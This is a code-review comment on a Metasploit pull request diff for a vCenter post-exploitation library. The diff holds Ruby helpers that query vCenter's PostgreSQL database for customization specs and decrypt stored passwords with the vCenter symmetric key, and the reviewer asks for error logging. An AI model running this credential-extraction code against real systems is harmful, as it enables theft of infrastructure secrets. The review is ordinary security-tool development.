lib/msf/core/post/vcenter/vcenter.rb

```diff
@@ -0,0 +1,711 @@
+        # @return [String] a string to run on command line
+        #
+        def postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost')
+          "PGPASSWORD=#{pg_password} #{psql_bin} -h '#{vcdb_host}' -U '#{vcdb_user}' -d '#{vcdb_name}'"
+        end
+
+        #
+        # Returns a list of vpc customization contents
+        # @param pg_password [String] postgress password
+        # @param vcdb_user [String] virtual center database username
+        # @param vcdb_name [String] virtual center database name
+        # @return [Hash] where the customization name is the key and value is the parsed xml doc, nil on error
+        #
+        def get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name)
+          return nil unless command_exists? psql_bin
+
+          output = {}
+          vpx_customization_specs = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT DISTINCT name FROM vc.vpx_customization_spec;' -P pager -A -t")
+          return nil if vpx_customization_specs.nil?
+
+          vpx_customization_specs = vpx_customization_specs.split("\n")
+          return nil unless vpx_customization_specs.first
+
+          vpx_customization_specs.each do |spec|
+            xml = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c \"SELECT body FROM vpx_customization_spec WHERE name = '#{spec}\';\" -P pager -A -t").to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
+            next if xml.nil?
+
+            begin
+              xmldoc = Nokogiri::XML(xml) do |config|
+                config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
+              end
+            rescue Nokogiri::XML::SyntaxError
+              print_bad("Unable to read XML from #{spec}")
+              next
+            end
+            output[spec] = xmldoc
+          end
+          output
+        end
+
+        #
+        # helper function to decrypt passwords stored in the pg database
+        # @param b64 [String] base64 string of the password exported from postgres
+        # @param vc_sym_key [String] sym key from virtual center
+        # @return [String] the decrypted password, nil on error
+
+        def vpx_aes_decrypt(b64, vc_sym_key)
+          # https://www.pentera.io/wp-content/uploads/2022/03/Sensitive-Information-Disclosure_VMware-vCenter_f.pdf
+          secret_bytes = Base64.strict_decode64(b64)
+          iv = secret_bytes[0, 16]
+          ciphertext = secret_bytes[16, 64]
+          decipher = OpenSSL::Cipher.new('aes-256-cbc')
+          decipher.decrypt
+          decipher.iv = iv
+          decipher.padding = 1
+          decipher.key = vc_sym_key
+          return (decipher.update(ciphertext) + decipher.final).delete("\000")
+        rescue StandardError
+          # fail_with(Msf::Exploit::Failure::Unknown, 'Error performing vpx_aes_decrypt')
+          ''
```

Comment:
I think we're still missing the logging here.

```suggestion
        rescue StandardError => e
          elog('Error performing vpx_aes_decrypt', error: e)
          ''
```